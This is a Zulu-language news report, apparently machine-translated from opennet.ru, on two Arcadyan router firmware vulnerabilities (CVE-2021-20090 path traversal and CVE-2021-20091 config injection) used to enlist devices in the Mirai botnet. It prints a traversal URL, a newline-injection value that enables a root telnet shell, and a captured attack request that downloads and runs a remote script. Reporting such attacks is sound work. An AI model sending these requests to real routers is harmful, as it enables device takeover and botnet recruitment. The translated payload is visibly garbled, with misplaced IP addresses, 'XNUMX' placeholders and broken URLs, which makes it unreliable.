Ukuhlasela okukhulu kurekhodiwe kunethiwekhi ngokumelene namarutha asekhaya ane-firmware esebenzisa ukuqaliswa kweseva ye-HTTP evela enkampanini ye-Arcadyan. Ukuze uthole ukulawula kumadivayisi, inhlanganisela yobungozi obubili isetshenziswa evumela ukukhishwa okukude kwekhodi engafanele enamalungelo ezimpande. Inkinga ithinta uhla olubanzi lwamarutha e-ADSL asuka e-Arcadyan, ASUS naseBuffalo, kanye namadivayisi ahlinzekwe ngaphansi kwemikhiqizo ye-Beeline (inkinga iqinisekiswa ku-Smart Box Flash), i-Deutsche Telekom, i-Orange, i-O2, i-Telus, i-Verizon, i-Vodafone kanye ne- abanye opharetha be-telecom. Kuyaphawulwa ukuthi inkinga ibikhona ku-Arcadyan firmware iminyaka engaphezu kwe-10 futhi ngalesi sikhathi ikwazile ukuthuthela okungenani kumamodeli wedivayisi we-20 kusuka kubakhiqizi abahlukene be-17.
Ukuba sengozini kokuqala, i-CVE-2021-20090, kwenza kube nokwenzeka ukufinyelela noma yisiphi isikripthi sokusebenzelana kwewebhu ngaphandle kokuqinisekisa. Ingqikithi yokuba sengozini iwukuthi kusixhumi esibonakalayo sewebhu, ezinye izinkomba okuthunyelwa ngazo izithombe, amafayela e-CSS nezikripthi ze-JavaScript zifinyeleleka ngaphandle kokuqinisekisa. Kulokhu, izinkomba lapho ukufinyelela okuvunyelwe ngaphandle kokuqinisekisa ziyahlolwa kusetshenziswa imaski yokuqala. Ukucacisa izinhlamvu ezithi “../” ezindleleni zokuya kumkhombandlela ongumzali kuvinjwe i-firmware, kodwa ukusebenzisa inhlanganisela ethi “..%2f” kweqiwe. Ngakho, kuyenzeka uvule amakhasi avikelwe uma uthumela izicelo ezifana nokuthi “http://192.168.1.1/images/..%2findex.htm”.
Ukuba sengozini kwesibili, i-CVE-2021-20091, ivumela umsebenzisi oqinisekisiwe ukuthi enze izinguquko kuzilungiselelo zesistimu yedivayisi ngokuthumela amapharamitha afomethwe ngokukhethekile kuskripthi se-apply_abstract.cgi, esingahloli ukubakhona kohlamvu olusha kumapharamitha. . Isibonelo, lapho wenza umsebenzi we-ping, umhlaseli angacacisa inani elithi “192.168.1.2%0AARC_SYS_TelnetdEnable=1” kunkambu lapho kubhekwa ikheli lasesizindeni se-inthanethi, kanye nombhalo, lapho edala ifayela lezilungiselelo /tmp/etc/config/ .glbcfg, izobhala umugqa othi “AARC_SYS_TelnetdEnable=1” kuwo ", owenza iseva ye-telnetd isebenze, enikeza ukufinyelela kwegobolondo lomyalo okungavinjelwe ngamalungelo ezimpande. Ngokufanayo, ngokusetha ipharamitha ye-AARC_SYS, ungasebenzisa noma iyiphi ikhodi kusistimu. Ukuba sengozini kokuqala kwenza kube nokwenzeka ukuqalisa iskripthi esiyinkinga ngaphandle kokuqinisekisa ngokufinyelela kuso njengokuthi “/images/..%2fapply_abstract.cgi”.
Ukuxhaphaza ubungozi, umhlaseli kufanele akwazi ukuthumela isicelo embobeni yenethiwekhi lapho kusetshenziswa okusetshenziswa kubonwa iwebhu. Ngokubheka ukuguquguquka kokusabalala kokuhlasela, opharetha abaningi bashiya ukufinyelela kumadivayisi abo kusuka kunethiwekhi yangaphandle ukuze kube lula ukutholakala kwezinkinga ngesevisi yokusekela. Uma ukufinyelela kusixhumi esibonakalayo kunqunyelwe kunethiwekhi yangaphakathi kuphela, ukuhlaselwa kungenziwa kusuka kunethiwekhi yangaphandle kusetshenziswa inqubo "ye-DNS rebinding". Ubungozi sebuvele busetshenziswa ngokuqhubekayo ukuxhuma amarutha kubhothi ye-Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_ping0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Source: opennet.ru